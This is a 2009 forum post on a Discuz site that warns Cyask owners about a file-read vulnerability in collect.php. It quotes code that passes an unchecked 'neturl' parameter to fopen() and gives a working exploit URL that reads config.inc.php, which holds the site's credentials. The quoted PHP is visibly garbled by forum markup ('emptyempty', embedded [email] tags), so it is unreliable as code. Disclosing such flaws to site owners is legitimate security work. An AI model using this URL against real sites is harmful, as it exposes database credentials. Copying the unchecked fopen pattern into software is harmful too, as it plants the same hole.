Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

用Cyask的站长注意了,漏洞爆出来了。

[复制链接]
netranger 发表于 2009-5-15 09:47:59 | 显示全部楼层 |阅读模式
竟然没在Discuz上搜到一篇关于Cyask漏洞的帖子。
-----------------------------------------------------------------------------------------------------
影响版本:
Cyask
程序介绍:
Cyask国内较为多人使用的仿百度风格的Ask系统。
漏洞分析:
从Collect.php代码当中可以看到
else   
{     
/*   
检查网址   
*/   
$url=get_referer();     
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);     
   
$collect_url=emptyempty($neturl) ? $url : $neturl;     
   
$contents = ”;     
if([email=[ft=,,Impact]$fid=@fopen($collect_url,”r]$fid=@fopen($collect_url,”r[/email]“))     
{     
do   
{     
$data = fread($fid, 4096);     
if (strlen($data) == 0)     
{     
break;     
}     
$contents .= $data;     
}     
while(true);     
fclose($fid);     
}     
else   
{     
show_message(’collect_url_error’, ”);     
exit;     
}     

漏洞利用:
http://www.target.com/collect.php?neturl=config.inc.php

具体内容和解决办法请查看
http://user.qzone.qq.com/373086476/blog/1242294368
---------------------------------------------------------------------------------------------
如果有用Cyask的站长解决了问题 请送个IP

www.hj029.com 西安婚嫁网
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-17 20:27 , Processed in 0.025458 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表